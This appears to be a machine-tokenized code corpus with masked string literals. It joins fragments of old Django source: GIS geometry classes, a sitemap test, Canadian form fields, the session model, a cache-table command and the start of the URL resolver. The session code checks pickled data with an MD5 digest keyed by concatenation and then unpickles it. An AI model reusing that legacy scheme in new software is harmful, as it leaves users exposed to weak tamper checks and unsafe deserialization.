SpatiaLiteFunction ( '<STR_LIT>' ) , <EOL> '<STR_LIT>' : SpatiaLiteFunction ( '<STR_LIT>' ) , <EOL> '<STR_LIT>' : SpatiaLiteFunction ( '<STR_LIT>' ) , <EOL> '<STR_LIT>' : SpatiaLiteFunction ( '<STR_LIT>' ) , <EOL> '<STR_LIT>' : SpatiaLiteFunction ( '<STR_LIT>' ) , <EOL> '<STR_LIT>' : ( SpatiaLiteRelate , basestring ) , <EOL> '<STR_LIT>' : SpatiaLiteFunction ( '<STR_LIT>' ) , <EOL> '<STR_LIT>' : SpatiaLiteFunction ( '<STR_LIT>' ) , <EOL> '<STR_LIT>' : SpatiaLiteFunction ( '<STR_LIT>' ) , <EOL> '<STR_LIT>' : SpatiaLiteFunction ( '<STR_LIT>' ) , <EOL> '<STR_LIT>' : SpatiaLiteFunction ( '<STR_LIT>' ) , <EOL> } <EOL> dtypes = ( Decimal , Distance , float , int , long ) <EOL> def get_dist_ops ( operator ) : <EOL> "<STR_LIT>" <EOL> return ( SpatiaLiteDistance ( operator ) , ) <EOL> DISTANCE_FUNCTIONS = { <EOL> '<STR_LIT>' : ( get_dist_ops ( '<STR_LIT:>>' ) , dtypes ) , <EOL> '<STR_LIT>' : ( get_dist_ops ( '<STR_LIT>' ) , dtypes ) , <EOL> '<STR_LIT>' : ( get_dist_ops ( '<STR_LIT:<>' ) , dtypes ) , <EOL> '<STR_LIT>' : ( get_dist_ops ( '<STR_LIT>' ) , dtypes ) , <EOL> } <EOL> SPATIALITE_GEOMETRY_FUNCTIONS . update ( DISTANCE_FUNCTIONS ) <EOL> MISC_TERMS = [ '<STR_LIT>' ] <EOL> SPATIALITE_TERMS = SPATIALITE_GEOMETRY_FUNCTIONS . keys ( ) <EOL> SPATIALITE_TERMS += MISC_TERMS <EOL> SPATIALITE_TERMS = dict ( ( term , None ) for term in SPATIALITE_TERMS ) <EOL> def get_geo_where_clause ( table_alias , name , lookup_type , geo_annot ) : <EOL> "<STR_LIT>" <EOL> geo_col = '<STR_LIT>' % ( qn ( table_alias ) , qn ( name ) ) <EOL> if lookup_type in SPATIALITE_GEOMETRY_FUNCTIONS : <EOL> tmp = SPATIALITE_GEOMETRY_FUNCTIONS [ lookup_type ] <EOL> if isinstance ( tmp , tuple ) : <EOL> op , arg_type = tmp <EOL> if not isinstance ( geo_annot . value , ( tuple , list ) ) : <EOL> raise TypeError ( '<STR_LIT>' % lookup_type ) <EOL> if len ( geo_annot . value ) != <NUM_LIT:2> : <EOL> raise ValueError ( '<STR_LIT>' % lookup_type ) <EOL> if not isinstance ( geo_annot . value [ <NUM_LIT:1> ] , arg_type ) : <EOL> raise TypeError ( '<STR_LIT>' % ( arg_type , type ( geo_annot . value [ <NUM_LIT:1> ] ) ) ) <EOL> if lookup_type == '<STR_LIT>' : <EOL> op = op ( geo_annot . value [ <NUM_LIT:1> ] ) <EOL> elif lookup_type in DISTANCE_FUNCTIONS : <EOL> op = op [ <NUM_LIT:0> ] <EOL> else : <EOL> op = tmp <EOL> return op . as_sql ( geo_col ) <EOL> elif lookup_type == '<STR_LIT>' : <EOL> return "<STR_LIT>" % ( geo_col , ( not geo_annot . value and '<STR_LIT>' or '<STR_LIT>' ) ) <EOL> raise TypeError ( "<STR_LIT>" % repr ( lookup_type ) ) </s>
<s> """<STR_LIT>""" <EOL> import re <EOL> from ctypes import addressof , byref , c_double , c_size_t <EOL> from django . contrib . gis . geos . mutable_list import ListMixin <EOL> from django . contrib . gis . geos . base import GEOSBase , gdal <EOL> from django . contrib . gis . geos . coordseq import GEOSCoordSeq <EOL> from django . contrib . gis . geos . error import GEOSException , GEOSIndexError <EOL> from django . contrib . gis . geos . libgeos import GEOM_PTR , GEOS_PREPARE <EOL> from django . contrib . gis . geos . mutable_list import ListMixin <EOL> from django . contrib . gis . geos import prototypes as capi <EOL> hex_regex = re . compile ( r'<STR_LIT>' , re . I ) <EOL> wkt_regex = re . compile ( r'<STR_LIT>' , re . I ) <EOL> class GEOSGeometry ( GEOSBase , ListMixin ) : <EOL> "<STR_LIT>" <EOL> _IndexError = GEOSIndexError <EOL> ptr_type = GEOM_PTR <EOL> def __init__ ( self , geo_input , srid = None ) : <EOL> """<STR_LIT>""" <EOL> if isinstance ( geo_input , basestring ) : <EOL> if isinstance ( geo_input , unicode ) : <EOL> geo_input = geo_input . encode ( '<STR_LIT:ascii>' ) <EOL> wkt_m = wkt_regex . match ( geo_input ) <EOL> if wkt_m : <EOL> if wkt_m . group ( '<STR_LIT>' ) : srid = int ( wkt_m . group ( '<STR_LIT>' ) ) <EOL> g = wkt_r . read ( wkt_m . group ( '<STR_LIT>' ) ) <EOL> elif hex_regex . match ( geo_input ) : <EOL> g = wkb_r . read ( geo_input ) <EOL> elif gdal . GEOJSON and gdal . geometries . json_regex . match ( geo_input ) : <EOL> g = wkb_r . read ( gdal . OGRGeometry ( geo_input ) . wkb ) <EOL> else : <EOL> raise ValueError ( '<STR_LIT>' ) <EOL> elif isinstance ( geo_input , GEOM_PTR ) : <EOL> g = geo_input <EOL> elif isinstance ( geo_input , buffer ) : <EOL> g = wkb_r . read ( geo_input ) <EOL> elif isinstance ( geo_input , GEOSGeometry ) : <EOL> g = capi . geom_clone ( geo_input . ptr ) <EOL> else : <EOL> raise TypeError ( '<STR_LIT>' % str ( type ( geo_input ) ) ) <EOL> if bool ( g ) : <EOL> self . ptr = g <EOL> else : <EOL> raise GEOSException ( '<STR_LIT>' ) <EOL> self . _post_init ( srid ) <EOL> def _post_init ( self , srid ) : <EOL> "<STR_LIT>" <EOL> if srid and isinstance ( srid , int ) : self . srid = srid <EOL> self . __class__ = GEOS_CLASSES [ self . geom_typeid ] <EOL> self . _set_cs ( ) <EOL> def __del__ ( self ) : <EOL> """<STR_LIT>""" <EOL> if self . _ptr : capi . destroy_geom ( self . _ptr ) <EOL> def __copy__ ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . clone ( ) <EOL> def __deepcopy__ ( self , memodict ) : <EOL> """<STR_LIT>""" <EOL> return self . clone ( ) <EOL> def __str__ ( self ) : <EOL> "<STR_LIT>" <EOL> return self . wkt <EOL> def __repr__ ( self ) : <EOL> "<STR_LIT>" <EOL> return '<STR_LIT>' % ( self . geom_type , hex ( addressof ( self . ptr ) ) ) <EOL> def __getstate__ ( self ) : <EOL> return str ( self . wkb ) , self . srid <EOL> def __setstate__ ( self , state ) : <EOL> wkb , srid = state <EOL> ptr = capi . from_wkb ( wkb , len ( wkb ) ) <EOL> if not ptr : raise GEOSException ( '<STR_LIT>' ) <EOL> self . ptr = ptr <EOL> self . _post_init ( srid ) <EOL> def __eq__ ( self , other ) : <EOL> """<STR_LIT>""" <EOL> if isinstance ( other , basestring ) : <EOL> return self . wkt == other <EOL> elif isinstance ( other , GEOSGeometry ) : <EOL> return self . equals_exact ( other ) <EOL> else : <EOL> return False <EOL> def __ne__ ( self , other ) : <EOL> "<STR_LIT>" <EOL> return not ( self == other ) <EOL> def __or__ ( self , other ) : <EOL> "<STR_LIT>" <EOL> return self . union ( other ) <EOL> def __and__ ( self , other ) : <EOL> "<STR_LIT>" <EOL> return self . intersection ( other ) <EOL> def __sub__ ( self , other ) : <EOL> "<STR_LIT>" <EOL> return self . difference ( other ) <EOL> def __xor__ ( self , other ) : <EOL> "<STR_LIT>" <EOL> return self . sym_difference ( other ) <EOL> @ property <EOL> def has_cs ( self ) : <EOL> "<STR_LIT>" <EOL> if isinstance ( self , ( Point , LineString , LinearRing ) ) : <EOL> return True <EOL> else : <EOL> return False <EOL> def _set_cs ( self ) : <EOL> "<STR_LIT>" <EOL> if self . has_cs : <EOL> self . _cs = GEOSCoordSeq ( capi . get_cs ( self . ptr ) , self . hasz ) <EOL> else : <EOL> self . _cs = None <EOL> @ property <EOL> def coord_seq ( self ) : <EOL> "<STR_LIT>" <EOL> if self . has_cs : <EOL> return self . _cs . clone ( ) <EOL> @ property <EOL> def geom_type ( self ) : <EOL> "<STR_LIT>" <EOL> return capi . geos_type ( self . ptr ) <EOL> @ property <EOL> def geom_typeid ( self ) : <EOL> "<STR_LIT>" <EOL> return capi . geos_typeid ( self . ptr ) <EOL> @ property <EOL> def num_geom ( self ) : <EOL> "<STR_LIT>" <EOL> return capi . get_num_geoms ( self . ptr ) <EOL> @ property <EOL> def num_coords ( self ) : <EOL> "<STR_LIT>" <EOL> return capi . get_num_coords ( self . ptr ) <EOL> @ property <EOL> def num_points ( self ) : <EOL> "<STR_LIT>" <EOL> return self . num_coords <EOL> @ property <EOL> def dims ( self ) : <EOL> "<STR_LIT>" <EOL> return capi . get_dims ( self . ptr ) <EOL> def normalize ( self ) : <EOL> "<STR_LIT>" <EOL> return capi . geos_normalize ( self . ptr ) <EOL> @ property <EOL> def empty ( self ) : <EOL> """<STR_LIT>""" <EOL> return capi . geos_isempty ( self . ptr ) <EOL> @ property <EOL> def hasz ( self ) : <EOL> "<STR_LIT>" <EOL> return capi . geos_hasz ( self . ptr ) <EOL> @ property <EOL> def ring ( self ) : <EOL> "<STR_LIT>" <EOL> return capi . geos_isring ( self . ptr ) <EOL> @ property <EOL> def simple ( self ) : <EOL> "<STR_LIT>" <EOL> return capi . geos_issimple ( self . ptr ) <EOL> @ property <EOL> def valid ( self ) : <EOL> "<STR_LIT>" <EOL> return capi . geos_isvalid ( self . ptr ) <EOL> def contains ( self , other ) : <EOL> "<STR_LIT>" <EOL> return capi . geos_contains ( self . ptr , other . ptr ) <EOL> def crosses ( self , other ) : <EOL> """<STR_LIT>""" <EOL> return capi . geos_crosses ( self . ptr , other . ptr ) <EOL> def disjoint ( self , other ) : <EOL> """<STR_LIT>""" <EOL> return capi . geos_disjoint ( self . ptr , other . ptr ) <EOL> def equals ( self , other ) : <EOL> """<STR_LIT>""" <EOL> return capi . geos_equals ( self . ptr , other . ptr ) <EOL> def equals_exact ( self , other , tolerance = <NUM_LIT:0> ) : <EOL> """<STR_LIT>""" <EOL> return capi . geos_equalsexact ( self . ptr , other . ptr , float ( tolerance ) ) <EOL> def intersects ( self , other ) : <EOL> "<STR_LIT>" <EOL> return capi . geos_intersects ( self . ptr , other . ptr ) <EOL> def overlaps ( self , other ) : <EOL> """<STR_LIT>""" <EOL> return capi . geos_overlaps ( self . ptr , other . ptr ) <EOL> def relate_pattern ( self , other , pattern ) : <EOL> """<STR_LIT>""" <EOL> if not isinstance ( pattern , basestring ) or len ( pattern ) > <NUM_LIT:9> : <EOL> raise GEOSException ( '<STR_LIT>' ) <EOL> return capi . geos_relatepattern ( self . ptr , other . ptr , pattern ) <EOL> def touches ( self , other ) : <EOL> """<STR_LIT>""" <EOL> return capi . geos_touches ( self . ptr , other . ptr ) <EOL> def within ( self , other ) : <EOL> """<STR_LIT>""" <EOL> return capi . geos_within ( self . ptr , other . ptr ) <EOL> def get_srid ( self ) : <EOL> "<STR_LIT>" <EOL> s = capi . geos_get_srid ( self . ptr ) <EOL> if s == <NUM_LIT:0> : return None <EOL> else : return s <EOL> def set_srid ( self , srid ) : <EOL> "<STR_LIT>" <EOL> capi . geos_set_srid ( self . ptr , srid ) <EOL> srid = property ( get_srid , set_srid ) <EOL> @ property <EOL> def ewkt ( self ) : <EOL> "<STR_LIT>" <EOL> if self . get_srid ( ) : return '<STR_LIT>' % ( self . srid , self . wkt ) <EOL> else : return self . wkt <EOL> @ property <EOL> def wkt ( self ) : <EOL> "<STR_LIT>" <EOL> return wkt_w . write ( self ) <EOL> @ property <EOL> def hex ( self ) : <EOL> """<STR_LIT>""" <EOL> return wkb_w . write_hex ( self ) <EOL> @ property <EOL> def json ( self ) : <EOL> """<STR_LIT>""" <EOL> if gdal . GEOJSON : <EOL> return self . ogr . json <EOL> else : <EOL> raise GEOSException ( '<STR_LIT>' ) <EOL> geojson = json <EOL> @ property <EOL> def wkb ( self ) : <EOL> "<STR_LIT>" <EOL> return wkb_w . write ( self ) <EOL> @ property <EOL> def kml ( self ) : <EOL> "<STR_LIT>" <EOL> gtype = self . geom_type <EOL> return '<STR_LIT>' % ( gtype , self . coord_seq . kml , gtype ) <EOL> @ property <EOL> def prepared ( self ) : <EOL> """<STR_LIT>""" <EOL> if GEOS_PREPARE : <EOL> return PreparedGeometry ( self ) <EOL> else : <EOL> raise GEOSException ( '<STR_LIT>' ) <EOL> @ property <EOL> def ogr ( self ) : <EOL> "<STR_LIT>" <EOL> if gdal . HAS_GDAL : <EOL> if self . srid : <EOL> return gdal . OGRGeometry ( self . wkb , self . srid ) <EOL> else : <EOL> return gdal . OGRGeometry ( self . wkb ) <EOL> else : <EOL> raise GEOSException ( '<STR_LIT>' ) <EOL> @ property <EOL> def srs ( self ) : <EOL> "<STR_LIT>" <EOL> if gdal . HAS_GDAL : <EOL> if self . srid : <EOL> return gdal . SpatialReference ( self . srid ) <EOL> else : <EOL> return None <EOL> else : <EOL> raise GEOSException ( '<STR_LIT>' ) <EOL> @ property <EOL> def crs ( self ) : <EOL> "<STR_LIT>" <EOL> return self . srs <EOL> def transform ( self , ct , clone = False ) : <EOL> """<STR_LIT>""" <EOL> srid = self . srid <EOL> if gdal . HAS_GDAL and srid : <EOL> g = gdal . OGRGeometry ( self . wkb , srid ) <EOL> g . transform ( ct ) <EOL> ptr = wkb_r . read ( g . wkb ) <EOL> if clone : <EOL> return GEOSGeometry ( ptr , srid = g . srid ) <EOL> if ptr : <EOL> capi . destroy_geom ( self . ptr ) <EOL> self . ptr = ptr <EOL> self . _post_init ( g . srid ) <EOL> else : <EOL> raise GEOSException ( '<STR_LIT>' ) <EOL> def _topology ( self , gptr ) : <EOL> "<STR_LIT>" <EOL> return GEOSGeometry ( gptr , srid = self . srid ) <EOL> @ property <EOL> def boundary ( self ) : <EOL> "<STR_LIT>" <EOL> return self . _topology ( capi . geos_boundary ( self . ptr ) ) <EOL> def buffer ( self , width , quadsegs = <NUM_LIT:8> ) : <EOL> """<STR_LIT>""" <EOL> return self . _topology ( capi . geos_buffer ( self . ptr , width , quadsegs ) ) <EOL> @ property <EOL> def centroid ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . _topology ( capi . geos_centroid ( self . ptr ) ) <EOL> @ property <EOL> def convex_hull ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . _topology ( capi . geos_convexhull ( self . ptr ) ) <EOL> def difference ( self , other ) : <EOL> """<STR_LIT>""" <EOL> return self . _topology ( capi . geos_difference ( self . ptr , other . ptr ) ) <EOL> @ property <EOL> def envelope ( self ) : <EOL> "<STR_LIT>" <EOL> return self . _topology ( capi . geos_envelope ( self . ptr ) ) <EOL> def intersection ( self , other ) : <EOL> "<STR_LIT>" <EOL> return self . _topology ( capi . geos_intersection ( self . ptr , other . ptr ) ) <EOL> @ property <EOL> def point_on_surface ( self ) : <EOL> "<STR_LIT>" <EOL> return self . _topology ( capi . geos_pointonsurface ( self . ptr ) ) <EOL> def relate ( self , other ) : <EOL> "<STR_LIT>" <EOL> return capi . geos_relate ( self . ptr , other . ptr ) <EOL> def simplify ( self , tolerance = <NUM_LIT:0.0> , preserve_topology = False ) : <EOL> """<STR_LIT>""" <EOL> if preserve_topology : <EOL> return self . _topology ( capi . geos_preservesimplify ( self . ptr , tolerance ) ) <EOL> else : <EOL> return self . _topology ( capi . geos_simplify ( self . ptr , tolerance ) ) <EOL> def sym_difference ( self , other ) : <EOL> """<STR_LIT>""" <EOL> return self . _topology ( capi . geos_symdifference ( self . ptr , other . ptr ) ) <EOL> def union ( self , other ) : <EOL> "<STR_LIT>" <EOL> return self . _topology ( capi . geos_union ( self . ptr , other . ptr ) ) <EOL> @ property <EOL> def area ( self ) : <EOL> "<STR_LIT>" <EOL> return capi . geos_area ( self . ptr , byref ( c_double ( ) ) ) <EOL> def distance ( self , other ) : <EOL> """<STR_LIT>""" <EOL> if not isinstance ( other , GEOSGeometry ) : <EOL> raise TypeError ( '<STR_LIT>' ) <EOL> return capi . geos_distance ( self . ptr , other . ptr , byref ( c_double ( ) ) ) <EOL> @ property <EOL> def extent ( self ) : <EOL> """<STR_LIT>""" <EOL> env = self . envelope <EOL> if isinstance ( env , Point ) : <EOL> xmin , ymin = env . tuple <EOL> xmax , ymax = xmin , ymin <EOL> else : <EOL> xmin , ymin = env [ <NUM_LIT:0> ] [ <NUM_LIT:0> ] <EOL> xmax , ymax = env [ <NUM_LIT:0> ] [ <NUM_LIT:2> ] <EOL> return ( xmin , ymin , xmax , ymax ) <EOL> @ property <EOL> def length ( self ) : <EOL> """<STR_LIT>""" <EOL> return capi . geos_length ( self . ptr , byref ( c_double ( ) ) ) <EOL> def clone ( self ) : <EOL> "<STR_LIT>" <EOL> return GEOSGeometry ( capi . geom_clone ( self . ptr ) , srid = self . srid ) <EOL> from django . contrib . gis . geos . linestring import LineString , LinearRing <EOL> from django . contrib . gis . geos . point import Point <EOL> from django . contrib . gis . geos . polygon import Polygon <EOL> from django . contrib . gis . geos . collections import GeometryCollection , MultiPoint , MultiLineString , MultiPolygon <EOL> GEOS_CLASSES = { <NUM_LIT:0> : Point , <EOL> <NUM_LIT:1> : LineString , <EOL> <NUM_LIT:2> : LinearRing , <EOL> <NUM_LIT:3> : Polygon , <EOL> <NUM_LIT:4> : MultiPoint , <EOL> <NUM_LIT:5> : MultiLineString , <EOL> <NUM_LIT:6> : MultiPolygon , <EOL> <NUM_LIT:7> : GeometryCollection , <EOL> } <EOL> from django . contrib . gis . geos . io import wkt_r , wkt_w , wkb_r , wkb_w <EOL> if GEOS_PREPARE : <EOL> from django . contrib . gis . geos . prepared import PreparedGeometry </s>
<s> import unittest , zipfile , cStringIO <EOL> from xml . dom import minidom <EOL> from django . test import Client <EOL> from models import City , Country <EOL> class GeoSitemapTest ( unittest . TestCase ) : <EOL> client = Client ( ) <EOL> def assertChildNodes ( self , elem , expected ) : <EOL> "<STR_LIT>" <EOL> actual = set ( [ n . nodeName for n in elem . childNodes ] ) <EOL> expected = set ( expected ) <EOL> self . assertEqual ( actual , expected ) <EOL> def test_geositemap_index ( self ) : <EOL> "<STR_LIT>" <EOL> doc = minidom . parseString ( self . client . get ( '<STR_LIT>' ) . content ) <EOL> index = doc . firstChild <EOL> self . assertEqual ( index . getAttribute ( u'<STR_LIT>' ) , u'<STR_LIT>' ) <EOL> self . assertEqual ( <NUM_LIT:3> , len ( index . getElementsByTagName ( '<STR_LIT>' ) ) ) <EOL> def test_geositemap_kml ( self ) : <EOL> "<STR_LIT>" <EOL> for kml_type in ( '<STR_LIT>' , '<STR_LIT>' ) : <EOL> doc = minidom . parseString ( self . client . get ( '<STR_LIT>' % kml_type ) . content ) <EOL> urlset = doc . firstChild <EOL> self . assertEqual ( urlset . getAttribute ( u'<STR_LIT>' ) , u'<STR_LIT>' ) <EOL> self . assertEqual ( urlset . getAttribute ( u'<STR_LIT>' ) , u'<STR_LIT>' ) <EOL> urls = urlset . getElementsByTagName ( '<STR_LIT:url>' ) <EOL> self . assertEqual ( <NUM_LIT:2> , len ( urls ) ) <EOL> for url in urls : <EOL> self . assertChildNodes ( url , [ '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> geo_elem = url . getElementsByTagName ( '<STR_LIT>' ) [ <NUM_LIT:0> ] <EOL> geo_format = geo_elem . getElementsByTagName ( '<STR_LIT>' ) [ <NUM_LIT:0> ] <EOL> self . assertEqual ( kml_type , geo_format . childNodes [ <NUM_LIT:0> ] . data ) <EOL> kml_url = url . getElementsByTagName ( '<STR_LIT>' ) [ <NUM_LIT:0> ] . childNodes [ <NUM_LIT:0> ] . data . split ( '<STR_LIT>' ) [ <NUM_LIT:1> ] <EOL> if kml_type == '<STR_LIT>' : <EOL> kml_doc = minidom . parseString ( self . client . get ( kml_url ) . content ) <EOL> elif kml_type == '<STR_LIT>' : <EOL> buf = cStringIO . StringIO ( self . client . get ( kml_url ) . content ) <EOL> zf = zipfile . ZipFile ( buf ) <EOL> self . assertEqual ( <NUM_LIT:1> , len ( zf . filelist ) ) <EOL> self . assertEqual ( '<STR_LIT>' , zf . filelist [ <NUM_LIT:0> ] . filename ) <EOL> kml_doc = minidom . parseString ( zf . read ( '<STR_LIT>' ) ) <EOL> if '<STR_LIT>' in kml_url : <EOL> model = City <EOL> elif '<STR_LIT>' in kml_url : <EOL> model = Country <EOL> self . assertEqual ( model . objects . count ( ) , len ( kml_doc . getElementsByTagName ( '<STR_LIT>' ) ) ) <EOL> def test_geositemap_georss ( self ) : <EOL> "<STR_LIT>" <EOL> from feeds import feed_dict <EOL> doc = minidom . parseString ( self . client . get ( '<STR_LIT>' ) . content ) <EOL> urlset = doc . firstChild <EOL> self . assertEqual ( urlset . getAttribute ( u'<STR_LIT>' ) , u'<STR_LIT>' ) <EOL> self . assertEqual ( urlset . getAttribute ( u'<STR_LIT>' ) , u'<STR_LIT>' ) <EOL> urls = urlset . getElementsByTagName ( '<STR_LIT:url>' ) <EOL> self . assertEqual ( len ( feed_dict ) , len ( urls ) ) <EOL> for url in urls : <EOL> self . assertChildNodes ( url , [ '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> geo_elem = url . getElementsByTagName ( '<STR_LIT>' ) [ <NUM_LIT:0> ] <EOL> geo_format = geo_elem . getElementsByTagName ( '<STR_LIT>' ) [ <NUM_LIT:0> ] <EOL> self . assertEqual ( '<STR_LIT>' , geo_format . childNodes [ <NUM_LIT:0> ] . data ) </s>
<s> """<STR_LIT>""" <EOL> from django . forms import ValidationError <EOL> from django . forms . fields import Field , RegexField , Select , EMPTY_VALUES <EOL> from django . forms . util import smart_unicode <EOL> from django . utils . translation import ugettext_lazy as _ <EOL> import re <EOL> phone_digits_re = re . compile ( r'<STR_LIT>' ) <EOL> sin_re = re . compile ( r"<STR_LIT>" ) <EOL> class CAPostalCodeField ( RegexField ) : <EOL> """<STR_LIT>""" <EOL> default_error_messages = { <EOL> '<STR_LIT>' : _ ( u'<STR_LIT>' ) , <EOL> } <EOL> def __init__ ( self , * args , ** kwargs ) : <EOL> super ( CAPostalCodeField , self ) . __init__ ( r'<STR_LIT>' , <EOL> max_length = None , min_length = None , * args , ** kwargs ) <EOL> class CAPhoneNumberField ( Field ) : <EOL> """<STR_LIT>""" <EOL> default_error_messages = { <EOL> '<STR_LIT>' : u'<STR_LIT>' , <EOL> } <EOL> def clean ( self , value ) : <EOL> """<STR_LIT>""" <EOL> super ( CAPhoneNumberField , self ) . clean ( value ) <EOL> if value in EMPTY_VALUES : <EOL> return u'<STR_LIT>' <EOL> value = re . sub ( '<STR_LIT>' , '<STR_LIT>' , smart_unicode ( value ) ) <EOL> m = phone_digits_re . search ( value ) <EOL> if m : <EOL> return u'<STR_LIT>' % ( m . group ( <NUM_LIT:1> ) , m . group ( <NUM_LIT:2> ) , m . group ( <NUM_LIT:3> ) ) <EOL> raise ValidationError ( self . error_messages [ '<STR_LIT>' ] ) <EOL> class CAProvinceField ( Field ) : <EOL> """<STR_LIT>""" <EOL> default_error_messages = { <EOL> '<STR_LIT>' : u'<STR_LIT>' , <EOL> } <EOL> def clean ( self , value ) : <EOL> from ca_provinces import PROVINCES_NORMALIZED <EOL> super ( CAProvinceField , self ) . clean ( value ) <EOL> if value in EMPTY_VALUES : <EOL> return u'<STR_LIT>' <EOL> try : <EOL> value = value . strip ( ) . lower ( ) <EOL> except AttributeError : <EOL> pass <EOL> else : <EOL> try : <EOL> return PROVINCES_NORMALIZED [ value . strip ( ) . lower ( ) ] . decode ( '<STR_LIT:ascii>' ) <EOL> except KeyError : <EOL> pass <EOL> raise ValidationError ( self . error_messages [ '<STR_LIT>' ] ) <EOL> class CAProvinceSelect ( Select ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , attrs = None ) : <EOL> from ca_provinces import PROVINCE_CHOICES <EOL> super ( CAProvinceSelect , self ) . __init__ ( attrs , choices = PROVINCE_CHOICES ) <EOL> class CASocialInsuranceNumberField ( Field ) : <EOL> """<STR_LIT>""" <EOL> default_error_messages = { <EOL> '<STR_LIT>' : _ ( '<STR_LIT>' ) , <EOL> } <EOL> def clean ( self , value ) : <EOL> super ( CASocialInsuranceNumberField , self ) . clean ( value ) <EOL> if value in EMPTY_VALUES : <EOL> return u'<STR_LIT>' <EOL> match = re . match ( sin_re , value ) <EOL> if not match : <EOL> raise ValidationError ( self . error_messages [ '<STR_LIT>' ] ) <EOL> number = u'<STR_LIT>' % ( match . group ( <NUM_LIT:1> ) , match . group ( <NUM_LIT:2> ) , match . group ( <NUM_LIT:3> ) ) <EOL> check_number = u'<STR_LIT>' % ( match . group ( <NUM_LIT:1> ) , match . group ( <NUM_LIT:2> ) , match . group ( <NUM_LIT:3> ) ) <EOL> if not self . luhn_checksum_is_valid ( check_number ) : <EOL> raise ValidationError ( self . error_messages [ '<STR_LIT>' ] ) <EOL> return number <EOL> def luhn_checksum_is_valid ( self , number ) : <EOL> """<STR_LIT>""" <EOL> sum = <NUM_LIT:0> <EOL> num_digits = len ( number ) <EOL> oddeven = num_digits & <NUM_LIT:1> <EOL> for count in range ( <NUM_LIT:0> , num_digits ) : <EOL> digit = int ( number [ count ] ) <EOL> if not ( ( count & <NUM_LIT:1> ) ^ oddeven ) : <EOL> digit = digit * <NUM_LIT:2> <EOL> if digit > <NUM_LIT:9> : <EOL> digit = digit - <NUM_LIT:9> <EOL> sum = sum + digit <EOL> return ( ( sum % <NUM_LIT:10> ) == <NUM_LIT:0> ) </s>
<s> import base64 <EOL> import cPickle as pickle <EOL> from django . db import models <EOL> from django . utils . translation import ugettext_lazy as _ <EOL> from django . conf import settings <EOL> from django . utils . hashcompat import md5_constructor <EOL> class SessionManager ( models . Manager ) : <EOL> def encode ( self , session_dict ) : <EOL> """<STR_LIT>""" <EOL> pickled = pickle . dumps ( session_dict ) <EOL> pickled_md5 = md5_constructor ( pickled + settings . SECRET_KEY ) . hexdigest ( ) <EOL> return base64 . encodestring ( pickled + pickled_md5 ) <EOL> def save ( self , session_key , session_dict , expire_date ) : <EOL> s = self . model ( session_key , self . encode ( session_dict ) , expire_date ) <EOL> if session_dict : <EOL> s . save ( ) <EOL> else : <EOL> s . delete ( ) <EOL> return s <EOL> class Session ( models . Model ) : <EOL> """<STR_LIT>""" <EOL> session_key = models . CharField ( _ ( '<STR_LIT>' ) , max_length = <NUM_LIT> , <EOL> primary_key = True ) <EOL> session_data = models . TextField ( _ ( '<STR_LIT>' ) ) <EOL> expire_date = models . DateTimeField ( _ ( '<STR_LIT>' ) ) <EOL> objects = SessionManager ( ) <EOL> class Meta : <EOL> db_table = '<STR_LIT>' <EOL> verbose_name = _ ( '<STR_LIT>' ) <EOL> verbose_name_plural = _ ( '<STR_LIT>' ) <EOL> def get_decoded ( self ) : <EOL> encoded_data = base64 . decodestring ( self . session_data ) <EOL> pickled , tamper_check = encoded_data [ : - <NUM_LIT:32> ] , encoded_data [ - <NUM_LIT:32> : ] <EOL> if md5_constructor ( pickled + settings . SECRET_KEY ) . hexdigest ( ) != tamper_check : <EOL> from django . core . exceptions import SuspiciousOperation <EOL> raise SuspiciousOperation , "<STR_LIT>" <EOL> try : <EOL> return pickle . loads ( pickled ) <EOL> except : <EOL> return { } </s>
<s> from django . core . management . base import LabelCommand <EOL> class Command ( LabelCommand ) : <EOL> help = "<STR_LIT>" <EOL> args = "<STR_LIT>" <EOL> label = '<STR_LIT>' <EOL> requires_model_validation = False <EOL> def handle_label ( self , tablename , ** options ) : <EOL> from django . db import connection , transaction , models <EOL> fields = ( <EOL> models . CharField ( name = '<STR_LIT>' , max_length = <NUM_LIT:255> , unique = True , primary_key = True ) , <EOL> models . TextField ( name = '<STR_LIT:value>' ) , <EOL> models . DateTimeField ( name = '<STR_LIT>' , db_index = True ) , <EOL> ) <EOL> table_output = [ ] <EOL> index_output = [ ] <EOL> qn = connection . ops . quote_name <EOL> for f in fields : <EOL> field_output = [ qn ( f . name ) , f . db_type ( ) ] <EOL> field_output . append ( "<STR_LIT>" % ( not f . null and "<STR_LIT>" or "<STR_LIT>" ) ) <EOL> if f . primary_key : <EOL> field_output . append ( "<STR_LIT>" ) <EOL> elif f . unique : <EOL> field_output . append ( "<STR_LIT>" ) <EOL> if f . db_index : <EOL> unique = f . unique and "<STR_LIT>" or "<STR_LIT>" <EOL> index_output . append ( "<STR_LIT>" % ( unique , tablename , f . name , qn ( tablename ) , <EOL> qn ( f . name ) ) ) <EOL> table_output . append ( "<STR_LIT:U+0020>" . join ( field_output ) ) <EOL> full_statement = [ "<STR_LIT>" % qn ( tablename ) ] <EOL> for i , line in enumerate ( table_output ) : <EOL> full_statement . append ( '<STR_LIT>' % ( line , i < len ( table_output ) - <NUM_LIT:1> and '<STR_LIT:U+002C>' or '<STR_LIT>' ) ) <EOL> full_statement . append ( '<STR_LIT>' ) <EOL> curs = connection . cursor ( ) <EOL> curs . execute ( "<STR_LIT:\n>" . join ( full_statement ) ) <EOL> for statement in index_output : <EOL> curs . execute ( statement ) <EOL> transaction . commit_unless_managed ( ) </s>
<s> """<STR_LIT>""" <EOL> import re <EOL> from django . http import Http404 <EOL> from django . core . exceptions import ImproperlyConfigured , ViewDoesNotExist <EOL> from django . utils . datastructures import MultiValueDict <EOL> from django . utils . encoding import iri_to_uri , force_unicode , smart_str <EOL> from django . utils . functional import memoize <EOL> from django . utils . importlib import import_module <EOL> from django . utils . regex_helper import normalize <EOL> from django . utils . thread_support import currentThread <EOL> try : <EOL> reversed <EOL> except NameError : <EOL> from django . utils . itercompat import reversed <EOL> from sets import Set as set <EOL> _resolver_cache = { } <EOL> _callable_cache = { } <EOL> _prefixes = { } <EOL> class Resolver404 ( Http404 ) : <EOL> pass <EOL> class NoReverseMatch ( Exception ) : <EOL> silent_variable_failure = True <EOL> def get_callable ( lookup_view , can_fail = False ) : <EOL> """<STR_LIT>""" <EOL> if not callable ( lookup_view ) : 